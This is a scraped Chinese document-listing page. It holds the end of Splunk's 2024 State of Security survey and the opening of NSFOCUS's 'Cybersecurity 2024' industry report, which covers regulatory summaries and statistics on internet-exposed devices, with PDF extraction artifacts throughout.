46%)。英国受访者在自动化能力方面也领先于其他国家/地区。特别是,它们在通用过程自动化(40%)和漏洞管理(35%)方面的自动化比例很高。技能短缺对英国组织的影响不像其他国家/地区那么大。30%的英国受访者表示,团队成员多次被要求在没有必要经验的情况下领导项目,而全球的这一比例只有 39%。只有 23%的受访者表示,由于技能短缺,关键的安全项目多次失败,而全球这一比例为 33%。这些方面的成功可能是英国组织遭受以下攻击的概率低于平均水平的原因:违规(35%,全球 43%)内部攻击(37%,全球 42%)商业电子邮件入侵(38%,全球 49%)DDoS 攻击(38%,全球 46%)帐户接管攻击(34%,全球 42%)勒索软件攻击(37%,全球 45%)软件供应链攻击(35%,全球 43%)美国美国受访者的数据很少偏离全球平均水平。但美国受访者领先于平均值的一个领域是生成式 AI 的使用策略72%的受访者都表示他们已经构建了这种策略,而全球这一比例为66%。相反,美国受访者是最不担心 AI 滥用是根本原因的群体,比例只有 18%。美国受访者在 MTTD 较长的问题上也很为难。40%的受访者表示他们的MTTD 为数周时间,而全球这一比例只有 35%,22%的受访者表示典型的 MTTD 是几个月,而全球这一比例只有 19%。但这似乎是一项正在进行的工作,因为30%的受访者提到他们通过过程自动化改进了 MTTD,而全球的这一比例为 25%。对于未来的优先事项,美国受访者更倾向于解决网络安全人才短缺的问题。21%的受访者表示希望聘用更多的安全运维人员(全球比例为 18%),25%的受访者计划提供安全运维培训(全球 23%)。Splunk Splunk 和 Turn Data Into Doing 是 Splunk Inc.在美国和其他国家/地区的商标和注册商标。所有其他品牌名称、产品名称或商标均属于其各自所有者。2024 Splunk Inc.保留所有权利。24-492903-Splunk-State-of-Security-110_SC关于 SplunkSplunk 可以帮助提高组织的数字韧性。领先组织使用我们的统一安全和可观测性平台来保持其数字系统的安全和可靠。组织相信 Splunk 可以防止基础设施、应用程序和安全事件成为重大问题,可以更快地从冲击中恢复到数字系统,并快速适应新的机遇。与 Splunk 保持对话。

    浏览量44人已浏览 发布时间2024-05-16 38页 推荐指数推荐指数推荐指数推荐指数推荐指数5星级
  • 绿盟科技:守初心 创新质——网络安全报告2024(115页).pdf

    网络安全2024-守初心 创新质绿盟版3-13排版.indd 1网络安全2024-守初心 创新质绿盟版3-13排版.indd 12024/5/8 17:42:522024/5/8 17:42:52绿盟科技集团股份有限公司(以下简称绿盟科技),成立于 2000 年 4 月,总部位于北京。公司于 2014 年 1 月 29 日在深圳证券交易所创业板上市,证券代码:300369。绿盟科技在国内设有50 余个分支机构,为政府、金融、运营商、能源、交通、科教文卫等行业用户与各类型企业用户,提供全线网络安全产品、全方位安全解决方案和体系化安全运营服务。公司在美国硅谷、日本东京、英国伦敦、新加坡及巴西圣保罗设立海外子公司和办事处,深入开展全球业务,打造全球网络安全行业的中国品牌。版权声明为避免合作伙伴及客户数据泄露,所有数据在进行分析前都已经 过匿名化处理,不会在中间环节出现泄露,任何与客户有关的具体信息,均不会出现在本报告中。网络安全2024-守初心 创新质绿盟版3-13排版.indd 2网络安全2024-守初心 创新质绿盟版3-13排版.indd 22024/5/8 17:42:522024/5/8 17:42:52卷首语2023 年是全面落实党的二十大精神开局之年,也是国家“十四五”规划实施承前启后的重要一年。一年中,国家持续深化网络安全能力和体系建设,制定发布了多项网络安全法规和政策,推动我国网络安全能力和体系的持续完善。尤其重要的是,习近平总书记通过全国网络安全和信息化工作会议对网络安全工作作出了重要指示,进一步明确了国家网络安全行业发展的思路、模式和方向。在发展思路上,就是要“坚持统筹发展和安全”,确立以“总体国家安全观”为引领的网络安全企业发展思路;在发展模式上,就是要“构建大网络安全工作格局”,建设开放协同的网络安全企业发展模式;在发展方向上,就是要“坚持筑牢国家网络安全屏障”,以持续创新全面提升网络安全服务供给能力。回顾过去的一年,“新质生产力”、“数据要素 X”、“人工智能大模型”、“产业链供应链韧性”等,成为国内外网络安全领域的高频热词,也同样成为引领网络安全行业发展新的“风口”。探究其背后的产业发展规律,则是网络安全的转型升级、新技术要素赋能、业务驱动融合等趋势正在加速发展布局。作为深耕网络安全产业前沿的一分子,我们密切关注国内外网络安全发展态势,并积极赋能网络安全供给侧创新研发。为此,我们依托自身研究队伍积淀,结合持续热点跟踪,将核心研究成果集结成册,形成本报告。网络安全2024-守初心 创新质绿盟版3-13排版.indd 3网络安全2024-守初心 创新质绿盟版3-13排版.indd 32024/5/8 17:42:522024/5/8 17:42:52CONTENTS本报告包括三个篇章,即:法规政策篇、安全态势篇、新技术发展篇,筛选汇聚了我司本年度在网络安全跟踪研究中的核心研究成果。其中,法规政策篇重点梳理选编了本年度国内外网络安全相关重点法规政策并做分析;安全态势篇重点梳理分析了我国网络安全热点领域的态势和特点;新技术发展篇重点梳理分析了网络安全相关新兴技术及应用的现状、痛点和发展走势等。辞旧迎新之际,寄望本报告能为支撑国家网络安全主管部门决策略尽绵薄。并期待依托我司技术产品和服务,秉承“专攻术业,成就所托”的宗旨,全力服务于国家“高质量发展和高水平安全良性互动”战略目标的实现,并为全面加强国家网络安全保障体系和能力持续贡献力量。绿盟科技集团董事长兼总裁 2024年 4 月 网络安全2024-守初心 创新质绿盟版3-13排版.indd 4网络安全2024-守初心 创新质绿盟版3-13排版.indd 42024/5/8 17:42:532024/5/8 17:42:53CONTENTS重要观点00101法规政策篇0051.1习近平总书记对网络安全和信息化工作作出重要指示0061.2国家市场监管总局等四部门联合印发关于开展网络安全服务认证工作的实施意见0071.3关于做好商用密码检测机构管理办法和商用密码应用安全性评估管理办法实施工作的公告 0071.4工信部、国家金融监管总局联合印发关于促进网络安全保险规范健康发展的意见0081.5工业和信息化部、国家互联网信息办公室等十六部门联合印发关于促进数据安全产业发展的指导意见0091.6国家数据局等部门发布“数据要素”三年行动计划(20242026 年)0101.7国家互联网信息办公室发布个人信息出境标准合同备案指南(第一版)0111.8国家互联网信息办公室就个人信息保护合规审计管理办法(征求意见稿)公开征求意见0111.9国家互联网信息办公室等七部门联合印发生成式人工智能服务管理暂行办法0121.10美国白宫发布国家网络安全战略0131.11欧盟网络安全条例正式生效(CybersecurityRegulation)Regulation(EU)2023/28410141.12美国国会通过2024 财年国防授权法案(NationalDefenseAuthorizationActforFiscalYear2024)014网络安全2024-守初心 创新质绿盟版3-13排版.indd 5网络安全2024-守初心 创新质绿盟版3-13排版.indd 52024/5/8 17:42:532024/5/8 17:42:53CONTENTS02安全态势篇0162.1网络资产暴露情况0172.2高风险主机0212.3恶意 IP 态势0242.4IPv6 安全态势0272.5暗网态势0302.6恶意软件威胁态势0362.7APT 攻击态势04303新技术发展篇0503.1大模型安全0513.2攻击面管理0643.3内幕风险管理0673.4数据安全0743.5供应链安全0853.6工业互联网安全0913.7车联网安全09804总结108网络安全2024-守初心 创新质绿盟版3-13排版.indd 6网络安全2024-守初心 创新质绿盟版3-13排版.indd 62024/5/8 17:42:532024/5/8 17:42:53001重要观点重要观点本年度政策法规主要涉及网络安全、数据安全、个人信息保护、技术发展与治理等四个大方向。网络安全方向的法规政策,主要涵盖战略规划、关键基础设施保护、供应链安全、密码应用、行业监管机制、重点领域应用、人才资金保障等。数据安全方向的法规政策,主要涵盖数据安全产业规划、战略衔接、数据跨境安全、行业数据安全监管、数据基础制度、数据安全共享机制等。个人信息保护方向的法规政策,主要涵盖个人信息出境管理、个人信息审计机制、特殊群体保护、区域性个人信息跨境共享机制等。技术发展与治理方向的法规政策,主要涵盖生成式人工智能、人脸识别技术、5G 融合应用、零信任、后量子密码、软件供应链等。观点 2:网络资产暴露2023 年,我国在互联网上暴露的网络资产数量庞大,主要涉及物联网资产、工业控制系统和安全设备,经济发达地区暴露数量较多。暴露的大量设备容易被不法分子攻击利用并造成经济损失,甚至危害国家安全。观点 3:高风险主机2023 年,我国开放的高风险端口资产数量庞大。这些高风险服务端口在互联网上暴露,会降低系统的安全性,给黑客以可乘之机。观点 4:暗网态势2023 年通过暗网监测显示,我国数据泄露情况令人担忧,公民个人隐私安全面临较高风险。泄露数据量大,涵盖金融、电商、教育、医疗、能源、政府等多个行业,涉及到日常工作生活的方方面面,数据泄露治理需求强烈。观点 1:法规政策网络安全2024-守初心 创新质绿盟版3-13排版.indd 1网络安全2024-守初心 创新质绿盟版3-13排版.indd 12024/5/8 17:42:532024/5/8 17:42:53002网络安全 2024:守初心 创新质观点 5:恶意软件威胁态势尽管执法机构已加大打击力度,但知名恶意软件衍生家族的持续涌现,特别是在勒索软件领域,这一现象尤为突出。同时,僵尸网络、挖矿木马、窃密木马等相对威胁程度较低的恶意软件家族也保持持续活跃状态,对网络安全构成持续威胁。因此,治理工作仍需加大投入,以应对当前严峻的网络安全形势。观点 6:APT 攻击态势缘政治紧张局势不断升级,高级持续性威胁(APT)组织的活动频率呈显著增长趋势。针对我国的 APT 攻击活动相较以往更为猛烈,对抗的激烈程度迅速提升。这些 APT 组织将僵尸网络与勒索软件相结合,巧妙地隐藏攻击痕迹于常规攻击活动中,使其隐匿性进一步增强。近两年来,APT 组织针对网络边界设备的攻击已成为主流手段,必须加强对边界设备自身安全性的重视与关注。观点 7:大模型安全2023 年,大模型的发展尚不成熟,面临着诸多隐患与风险。随着深度学习技术的发展和相关安全研究的深入,以大模型为目标的攻击会朝着更为高效、轻量级的方向发展,对实际部署和应用中的大模型造成威胁。同时,随着大模型能力的提升和应用的扩展,潜在的安全漏洞和隐患会引发更大范围和更为严重的后果。观点 8:攻击面管理随着企业数字化转型的推进,加之网络攻击技术不断演进,如 APT(高级持续性威胁)、勒索软件、供应链攻击等新型的威胁层出不穷,使得企业攻击面不断扩大、难以有效管理。因此,结合国内外安全现状,传统的网络安全防御手段难以完全应对这些新型威胁,防守方需要采用新的方法来可视化和评估组织的攻击面。网络安全2024-守初心 创新质绿盟版3-13排版.indd 2网络安全2024-守初心 创新质绿盟版3-13排版.indd 22024/5/8 17:42:542024/5/8 17:42:54003重要观点观点 9:内幕风险管理近些年的观察中发现,大量安全事件由组织机构内部人员引发,由此产生了内幕风险的概念。内幕风险管理不同于内部威胁管理,会同时关注内部的恶意人员和非恶意人员,以“人因”为要素进行关键安全管理,保障组织机构安全。内幕风险正受到越来越多的关注,数字与智能化发展于未来三年不断推升内幕风险管理需求,并将其逐步纳入组织机构常态化安管范围。观点 10:数据安全2023 年,数据安全成为热点话题之一。全球数据安全事件频发,云场景下数据安全风险大幅增长,供应链攻击严重威胁数据安全;数据安全领域政策密集推出,重点关注数据跨境传输、数据互联互通与数据交易;数据要素市场规模不断扩大,信创产品需求旺盛。两项热点技术中,机密计算百花齐放,安全多方计算也得到了重视,但二者仍存在较大的改进空间。观点 11:供应链安全我国的软件产品面临着漏洞后门、开源协议、出口管制等多种供应链攻击风险。同时存在着,透明度不足、供应链管理水平参差不齐、缺乏统一的软件供应链管理标准及机制等问题。从软件开发者、使用者以及管理机构的角度来看,软件供应链的各个环节均存在着巨大的安全隐患。供应链安全处理难度高,需要通过制度与能力的建设来控制风险,保护信息化系统的平稳运行。网络安全2024-守初心 创新质绿盟版3-13排版.indd 3网络安全2024-守初心 创新质绿盟版3-13排版.indd 32024/5/8 17:42:542024/5/8 17:42:54004网络安全 2024:守初心 创新质观点 12:工业互联网安全工业互联网安全产业正在经历快速增长和变革,定制化的安全产品和服务正在获得更多的关注,因为它们能够将信息安全元素与业务深度融合,满足不同行业的个性化需求。此外,数据安全也被视为工业互联网安全的重要一环,未来将成为安全关注的重点。工业互联网已经成为现代战争的首要攻击目标,随着 5G、物联网、云计算等技术的发展,工业互联网的边界变得越来越模糊,边缘设备成为新的攻击入口点,必须加强对边缘设备的安全防护。观点 13:车联网安全汽车智能网联功能越来越普及,随之也带来了更多的安全风险,相关的系统漏洞和数据泄露事件被频繁披露。未来,自动驾驶和车路协同的落地后,会扩大车内和路边设备的漏洞风险面至车路协同的网络之中。汽车、车主个人信息和轨迹,是未来几年内汽车黑客的重要目标。车联网数据安全是实现车联网数据运营的前提保障,而汽车虚拟化或可成为未来车联网安全的重点研究方向之一。网络安全2024-守初心 创新质绿盟版3-13排版.indd 4网络安全2024-守初心 创新质绿盟版3-13排版.indd 42024/5/8 17:42:552024/5/8 17:42:5501法规政策篇网络安全2024-守初心 创新质绿盟版3-13排版.indd 5网络安全2024-守初心 创新质绿盟版3-13排版.indd 52024/5/8 17:42:552024/5/8 17:42:55006网络安全 2024:守初心 创新质2023 年国家持续深化网络安全能力和体系建设,制定发布了多项网络安全法规和政策,推动我国网络安全法治体系的持续完善。我们结合日常研究,选编 2023 年以来国内外发布的部分网络安全重点法规政策加以分析解读,以期与业界同仁一道学习探究网络安全领域的发展导向。1.1 习近平总书记对网络安全和信息化工作作出重要指示2023 年 7 月 14 日,全国网络安全和信息化工作会议在京召开。会议传达了习近平总书记近日对网络安全和信息化工作的重要指示,强调深入贯彻党中央关于网络强国的重要思想,大力推动网信事业高质量发展。习近平总书记重要指示重点提出网信工作“十个坚持”原则。一是坚持党管互联网;二是坚持网信为民;三是坚持走中国特色治网之道;四是坚持统筹发展和安全;五是坚持正能量是总要求、管得住是硬道理、用得好是真本事;六是坚持筑牢国家网络安全屏障;七是坚持发挥信息化驱动引领作用;八是坚持依法管网、依法办网、依法上网;九是坚持推动构建网络空间命运共同体;十是坚持建设忠诚干净担当的网信工作队伍。【原文链接】http:/ 创新质绿盟版3-13排版.indd 6网络安全2024-守初心 创新质绿盟版3-13排版.indd 62024/5/8 17:42:552024/5/8 17:42:55007法规政策篇1.2 国家市场监管总局等四部门联合印发关于开展网络安全服务认证工作的实施意见2023 年 3 月 28 日,国家市场监督管理总局、中央网络安全和信息化委员会办公室、工业和信息化部以及公安部四部门发布 关于开展网络安全服务认证工作的实施意见(简称 实施意见)。实施意见旨在推进网络安全服务认证体系建设,提升网络安全服务机构能力水平和服务质量。【原文链接】https:/ 实施意见 对于进一步推动网络安全服务认证工作的体系化、规范化和有序化发展,对完善我国网络安全认证体系具有现实意义。一是立足解决当前网络安全服务机构面临的重复认证等问题,推动网络安全服务认证的一体化发展;二是推进完善、优化网络安全服务认证体系,明确提出建立“网络安全服务认证目录”、组建“网络安全服务认证技术委员会”等制度安排;三是实现政策间的衔接,例如实施意见将等级保护测评纳入认证目录,与此前发布的检验机构能力认可准则在网络安全等级测评领域的应用说明等制度设计保持一致。对于网络安全行业而言,“网络安全服务认证目录”等制度值得持续关注。如新的网络安全服务认证涉及哪些服务类别?现有的网络安全服务认证资质在申请流程等方面是否有变化?都与业务开展密切相关。1.3 关于做好商用密码检测机构管理办法和商用密码应用安全性评估管理办法实施工作的公告2023 年 10 月 31 日国家密码管理局发布。商用密码检测机构管理办法和商用密码应用安全性评估管理办法于 2023 年 11 月 1 日起正式施行。公告提出两项具体要求:一是按照商用密码检测机构管理办法有关规定,受理商用密码检测机构资质申请。二是按照商用密码检测机构管理办法有关规定,对提交申请的商用密码应用安全性评估试点机构依法实施资质认定后,商用密码应用安全性评估试点工作将正式结束。此外,公告还附有“商用密码检测机构资质申请表”文件。网络安全2024-守初心 创新质绿盟版3-13排版.indd 7网络安全2024-守初心 创新质绿盟版3-13排版.indd 72024/5/8 17:42:562024/5/8 17:42:56008网络安全 2024:守初心 创新质【原文链接】http:/ 2007 年提出,经过十余年积累,密评制度体系不断成熟。有两点值得特别关注。一是密评的范围进一步扩大,从商密条例的特定“关键信息基础设施运营者”,到商用密码应用安全性评估管理办法“使用商用密码技术、产品和服务的网络与信息系统”。二是密评机构开启统筹管理模式,将商用密码产品检测和密评机构工作纳入统一管理,改变此前相互分立管理的工作模式,并结束了 48 家试点机构“试点”状态(2021 年 6 月,国家密码管理局更新了商用密码应用安全性评估试点机构目录,共计 48 家机构),统一按照新规则进行重新认定。1.4 工信部、国家金融监管总局联合印发关于促进网络安全保险规范健康发展的意见2023 年 7 月 17 日,工业和信息化部、国家金融监督管理总局联合发布关于促进网络安全保险规范健康发展的意见(以下简称意见)。意见旨在引导网络安全保险健康有序发展,培育网络安全保险新业态。意见围绕完善政策标准、创新产品服务、强化技术支持、促进需求释放、培育产业生态等提出 5 方面 10 条意见。【原文链接】https:/ 创新质绿盟版3-13排版.indd 8网络安全2024-守初心 创新质绿盟版3-13排版.indd 82024/5/8 17:42:562024/5/8 17:42:56009法规政策篇意见对外整合资源,明确网络安全保险行业的建设发展模式。一是引导技术赋能,包括网络安全风险评估技术和网络安全风险监测技术;二是强化市场培育,包括行业级市场和企业级市场;三是注重生态发展,包括塑造生态链关键主体和培育生态链关键机制等。对网络安全行业来说,意见的发布,无疑将为网络安全产业发展带来新机遇。一是为网络安全企业提供一种新的抗风险方案。按照意见的制度设计,网络安全保险将逐步健全覆盖技术开发和创新风险,以风险转移和社会化的方式,有助于拓展企业的抵御风险机制。二是为网络安全企业提供新的市场机遇。网络安全保险模型开发、风险评估工具开发、风险评估服务技术支撑等,都是网络安全产业较为直接的市场驱动因素。此外,由网络安全保险政策标准制订、生态机制建设等带来的衍生类市场需求,如咨询规划、方案设计等服务,也会带来一定规模的市场驱动力。1.5 工业和信息化部、国家互联网信息办公室等十六部门联合印发关于促进数据安全产业发展的指导意见2023 年 1 月 13 日,工业和信息化部、国家互联网信息办公室等十六部门联合印发关于促进数据安全产业发展的指导意见(以下简称指导意见),旨在推动数据安全产业高质量发展,提高各行业各领域数据安全保障能力,加速数据要素市场培育和价值释放。指导意见提出了促进数据安全产业发展的九个方面、十九条具体指导意见,明确了以下两方面内容。【原文链接】http:/ 2025 年实现 1500 亿元、复合增长率 30%的发展目标。另一方面,指导意见进一步阐明了如何构建数据安全产业体系和能力的问题。一是明确了数据安全产业的基本体系。指导意见提出了数据安全产业发展的七大项重点任务,其中前四项任务(创新、服务、标准、应用)侧重于产业体系的构建。二是明确了数据安全产网络安全2024-守初心 创新质绿盟版3-13排版.indd 9网络安全2024-守初心 创新质绿盟版3-13排版.indd 92024/5/8 17:42:562024/5/8 17:42:56010网络安全 2024:守初心 创新质业的发展要素。指导意见提出的数据安全产业发展七项重点任务的后三项,即产业生态、人才资源、国际合作,则是侧重于从要素层面布局推进数据安全产业的发展。对行业来说,可重点关注三方面。一是强化产品创新,结合指导意见明确的创新需求,重点围绕新计算模式、新网络架构和新应用场景等数据安全需求加强创新,持续完善行业数据安全技术产品体系。二是强化服务创新,结合指导意见提出的数据安全服务需求,重点强化规划咨询、建设运维、检测评估与认证、权益保护、违约鉴定等服务。三是强化基础要素保障,拓展行业现有产学研用合作攻关平台建设、加大数据安全实战人才培养和选拔等。1.6 国家数据局等部门发布“数据要素”三年行动计划(20242026 年)国家数据局等部门于2024年1月4日联合发布了 “数据要素”三年行动计划(20242026 年)。该行动计划以推动数据要素高水平应用为主线,重点在于推进数据要素协同优化、复用增效和融合创新的作用发挥,同时强调了强化场景需求引导,促进数据要素的高质量供给和合规高效流通,培育新产业、新模式和新动能,最终实现数据要素的价值,为推动高质量发展和中国式现代化提供有力支撑。该行动计划坚持需求牵引、注重实效,试点先行、重点突破,以有效市场、有为政府,开放融合和安全有序为基本原则,同时明确了截至 2026年底的工作目标。该计划选取了 12 个行业和领域,包括工业制造、现代农业、商贸流通、交通运输、金融服务、科技创新、文化旅游、医疗健康、应急管理、气象服务、城市治理和绿色低碳等,旨在推动数据要素的乘数效应,释放数据要素的价值。此外,该行动计划从提升数据供给水平、优化数据流通环境和加强数据安全保障等三个方面强化了保障支撑。【原文链接】https:/ 2023 年 12 月 16 日发布行动计划(征求意见稿),开展了为期 7天的公开面向社会征求意见。本次发布为正式稿。总体比较来看,在基本框架、内容体系等方面无太大变化。就数据安全相关内容而言,在整个行动计划中依然是“保障支撑”的基本定位,内容也保持了“落实制度”、“丰富产品”、“培育服务”三个要点。与征求意见稿相比,具体修改主要有两处。一是在“落实制度”具体内容中删除了“建网络安全2024-守初心 创新质绿盟版3-13排版.indd 10网络安全2024-守初心 创新质绿盟版3-13排版.indd 102024/5/8 17:42:562024/5/8 17:42:56011法规政策篇立健全数据安全治理体系”,或体现了当前更加注重强调法规政策的延续和稳定性,而不过分追求制度的“立新”。二是在“培育服务”中,将原来的“鼓励有实力的数据安全企业,发挥能力优势”改为“鼓励数据安全企业”,在培育对象的范围方面比以前更加扩大,或反映了监管方在培育数据要素安全服务方面的思路由示范引导到普适支持的调整变化。1.7 国家互联网信息办公室发布个人信息出境标准合同备案指南(第一版)2023 年 5 月 30 日,国家互联网信息办公室发布个人信息出境标准合同备案指南(第一版)(以下简称备案指南)。备案指南旨在落实个人信息出境标准合同办法,指导和帮助个人信息处理者规范、有序备案个人信息出境标准合同。备案指南对个人信息出境标准合同适用范围、备案方式和备案流程等具体要求作出了明确。【原文链接】http:/ 国家互联网信息办公室就个人信息保护合规审计管理办法(征求意见稿)公开征求意见2023 年 8 月 3 日,国家互联网信息办公室就个人信息保护合规审计管理办法(征求意见稿)(以下简称征求意见稿)公开征求意见。征求意见稿旨在规范个人信息保网络安全2024-守初心 创新质绿盟版3-13排版.indd 11网络安全2024-守初心 创新质绿盟版3-13排版.indd 112024/5/8 17:42:562024/5/8 17:42:56012网络安全 2024:守初心 创新质护合规审计活动,提高个人信息处理活动合规水平,并以附件的形式提出个人信息保护合规审计参考要点。【原文链接】http:/ 征求意见稿 所规范的“个人信息保护审计”更加侧重于对个人信息保护的事前防范,强调个人信息处理者的常态化合规。征求意见稿法律依据为个人信息保护法第五十四条:“个人信息处理者应当定期对其处理个人信息遵守法律、行政法规的情况进行合规审计”,旨在建立健全我国个人信息保护合规审计制度。对于个人信息处理者以及第三方专业机构开展个人信息合规审计工作具有重要实践意义。目前,个人信息保护合规审计管理办法(征求意见稿)尚处于征求意见阶段,对网络安全行业来说,可重点关注以下两点。一是,关注后续相关政策的更新与落实,如个人信息保护合规审计相关标准、个人信息保护合规审计专业机构管理政策,以及与个人信息保护影响评估等制度的衔接等。二是,关注新的市场机会点,如服务于个人信息处理者的个人信息保护合规审计咨询、教育和培训服务等;服务于个人信息保护合规审计专业机构的技术产品、解决方案等。1.9 国家互联网信息办公室等七部门联合印发生成式人工智能服务管理暂行办法2023年7月13日,国家互联网信息办公室、国家发展和改革委员会、教育部、科学技术部、工业和信息化部、公安部、国家广播电视总局七部门联合发布生成式人工智能服务管理暂行办法(以下简称办法),自 2023 年 8 月 15 日起开始施行。办法共 5 章 24 条,旨在促进生成式人工智能健康发展和规范应用。【原文链接】http:/ 创新质绿盟版3-13排版.indd 12网络安全2024-守初心 创新质绿盟版3-13排版.indd 122024/5/8 17:42:562024/5/8 17:42:56013法规政策篇【观点解读】当前,生成式人工智能(GAI)面临着数据、算法和算力方面的安全风险。在数据方面,主要涉及数据质量、保护机制和真实性问题;在算法方面,主要是认知安全问题;在算力方面,主要有成本和生态问题。办法是国内外为数不多的正式实施的生成式人工智能管理制度之一,为这一领域的发展提供了重要范例。从网络安全产业发展来看,办法 的施行将产生积极影响。一是安全需求的明确,将给网络安全相关产业带来增量市场机会。如对于训练数据的合规和安全评估、服务提供过程中的数据和个人信息保护、监督检查过程中的安全技术支持、安全可信相关配套等等。二是对于发展要素的培育强化,将为网络安全产业的技术创新赋能。如“公共训练数据资源平台”、“人工智能基础设施”等算力和数据要素,将极大缓解企业在生成式人工智能开发过程中的能力短板;生成式人工智能生态体系的构建,也将为企业的生成式人工智能开发注入新的活力。从制度的健全完善角度来看,以下几个问题或许值得进一步完善和细化。一是法规的体系化方面,除办法外,涉及生成式人工智能技术管理相关的规定还有互联网信息服务深度合成管理规定、互联网信息服务算法推荐管理规定等,不同规定之间的竞合问题需要进一步梳理完善,且作为总体性规范的 互联网信息服务管理办法 也亟需加快推进修订。二是在监督检查机制方面,办法提出了不同部门按照职责开展检查的机制,对于不同部门之间的监督检查如何协调统筹,也有待进一步细化。1.10 美国白宫发布国家网络安全战略2023年3月2日,美国白宫发布 国家网络安全战略(National Cybersecurity Strategy)(以下简称 2023 版战略)。2023 版战略详细阐述了拜登政府对于美国网络安全的顶层规划和全面部署,旨在建立一个“可防御、有弹性的数字生态系统”。【原文链接】https:/www.whitehouse.gov/briefing-room/statements-releases/2023/03/02/fact-sheet-biden-harris-administration-announces-national-cybersecurity-strategy/【观点解读】2023 版战略体现了以下四个方面的特点。第一,作为美国网络安全战略的重要组成部分,该版本完善了美国网络安全治理体系,承前启后,推进了网络安全战略思路。第二,持续强化了重点领域的战略投资举措,并特别强调了“投资和建设未来的数字生态系统”。网络安全2024-守初心 创新质绿盟版3-13排版.indd 13网络安全2024-守初心 创新质绿盟版3-13排版.indd 132024/5/8 17:42:572024/5/8 17:42:57014网络安全 2024:守初心 创新质第三,通过联合手段逐步增强了网络安全联盟生态。第四,优化了网络安全监管原则,压实了企业的主体责任。2023 版战略提出的建设内容反映了拜登政府下一步网络安全治理思路。一是进一步强化“以攻为守”的网络安全策略,后续或将对美国网络安全的监管方式、合作路径等方面产生影响;二是带动网络安全市场发展,如零信任、量子计算等相关技术和信息基础设施、半导体供应链等应用场景;三是对产业、外交等领域的溢出效应将持续显现,影响网络空间生态、地域联盟等的发展。1.11 欧盟网络安全条例正式生效(Cybersecurity Regulation)Regulation(EU)2023/28412024 年1月8日,欧盟理事会发布了一项 条例,规定了欧盟内部实体的网络安全风险管理、治理和控制框架的具体措施。此外,欧盟将成立一个新的机构间网络安全委员会(IICB),并授权该条例为 CERT-EU 提供了扩展的计算机紧急响应小组授权。接下来,欧盟将按照该条例的规定建立内部网络安全治理流程,并逐步实施具体的网络安全风险管理措施,同时推动 IICB尽快成立并投入运营。【原文链接】https:/eur-lex.europa.eu/legal-content/EN/TXT/?uri=OJ:L_202302841【观点解读】欧盟网络安全条例与欧盟网络安全法(Regulation(EU)2019/881)、全欧盟网络与信息安全指令(NIS2 指令)、欧盟信息安全条例等一起构成了欧盟网络安全法律法规框架。这些法规在效力层级和网络安全规定方面各有不同的重点。欧盟网络安全条例共分为 6 章 26 条,主要规定了欧盟网络安全的普适性措施、机构间网络安全委员会(IICB)的职责、CERT-EU 机构的职责、信息共享机制等内容。特别值得注意的是,该条例对 CERT-EU 的职能进行了扩展,将其定位为服务欧盟机构、团体的“网络安全服务中心”(Cybersecurity Service for the Union institutions,bodies,offices and agencies),并大幅增加了CERT-EU 相关的服务项目授权条款,例如授权其有偿开展网络安全广谱监测、漏洞扫描服务等。1.12 美国国会通过2024 财年国防授权法案(National 网络安全2024-守初心 创新质绿盟版3-13排版.indd 14网络安全2024-守初心 创新质绿盟版3-13排版.indd 142024/5/8 17:42:572024/5/8 17:42:57015法规政策篇Defense Authorization Act for Fiscal Year 2024)2023 年 12 月 14 日,美国众议院通过了2024 授权法案。该法案确定了美国在 2024财年国防方面的资金支出计划,并同时明确提出了美国在网络安全、国家安全等重点领域的优先事项。【原文链接】https:/www.armed-services.senate.gov/press-releases/reed-wicker-praise-senate-passage-of-the-fy-2024-national-defense-authorization-act【观点解读】2024 授权法案在网络安全方面的条款包括以下几方面:一是关于网络作战的规定,涵盖了战略网络安全计划及相关事项的协调和澄清。二是关于信息技术和数据管理的规定,包括制订数据链战略相关政策等内容。三是关于网络安全的规定,包括增强核指挥、控制和通信网络的网络安全等内容。四是关于人工智能的规定,包括人工智能漏洞赏金计划等内容。五是关于人员保障的规定,包括开展民用网络安全储备试点计划等内容。2024 授权法案此前已经由参议院投票通过,随后将提交总统签署并正式生效。总预算 8860 亿美元,较 2023 年增加了 280 亿美元,增幅约 3%。据初步统计,其中网络安全预算约为 14.5 亿美元,较 2023 年增长了 14%。这表明,美国网络安全国防预算的增速远高于国防预算总体增速。根据该法案,2024 年美国网络安全国防的主要支出领域包括:网络安全风险和态势感知、信息技术和数据管理、网络战能力、人工智能等。这表明,美国正在大力加强国防网络安全,其中在网络安全投入方面的增长速度远高于国防预算的整体增速。网络安全2024-守初心 创新质绿盟版3-13排版.indd 15网络安全2024-守初心 创新质绿盟版3-13排版.indd 152024/5/8 17:42:572024/5/8 17:42:5702安全态势篇网络安全2024-守初心 创新质绿盟版3-13排版.indd 16网络安全2024-守初心 创新质绿盟版3-13排版.indd 162024/5/8 17:42:572024/5/8 17:42:57017安全态势篇2.1 网络资产暴露情况2.1.1 重要设备资产截至2023年12月31日,全国共暴露重要设备资产数量为15,657,493,包括物联网资产、工业控制系统和安全设备,如图 2.1 所示。暴露总数排名前三的省市分别为北京市、台湾省和广东省,接下来暴露数量比较多的是东南沿海城市和大湾区,如浙江省、香港特别行政区、江苏省、上海市等。其中,物联网资产暴露数量最多,约占总暴露资产的 61.80%,安全设备资产其次,约占总暴露资产的 39.13%;并且北京市暴露资产数量最多,这可能是当地安全设备和物联网资产的总数基数最大,暴露在网上资产最多。工控资产暴露数量靠前的分别是台湾、辽宁和江西。安全设备暴露数量前三的是北京、广东和香港。北京市台湾省广东省浙江省香港特别行政区江苏省上海市四川省山东省河南省安全设备 1543544789933083708744918329758986161481338247511142819物联网2552801029754351123417316189528246835102584210941121661150582工控设备73130110715011621646147150560200,000400,000600,000800,0001,000,0001,200,0001,400,0001,600,0001,800,0002,000,000暴露数量(个)工控设备物联网安全设备图 2.1 全国暴露重要设备资产规模分布省市暴露数量最多的物联网资产依次为摄像头、路由器、NAS、打印机、网络电话(VoIP)、交换机、门禁等。其中,摄像头、路由器和 NAS 是暴露数量最多的物联网资产,占比分别为52.62%、28.44%和 14.27%,如图 2.2 所示。暴露在互联网上的摄像头存在巨大的安全隐患,一旦被黑客控制,可能会造成个人隐私泄露,给用户的隐私安全带来了严重威胁。网络安全2024-守初心 创新质绿盟版3-13排版.indd 17网络安全2024-守初心 创新质绿盟版3-13排版.indd 172024/5/8 17:42:582024/5/8 17:42:58018网络安全 2024:守初心 创新质11716736332123176453126425462216881495333790200000400000600000800000100000012000001400000坐标轴标题图 2.2 暴露物联网资产类型分布2.1.2 重要服务资产互联网上的应用层出不穷,Web 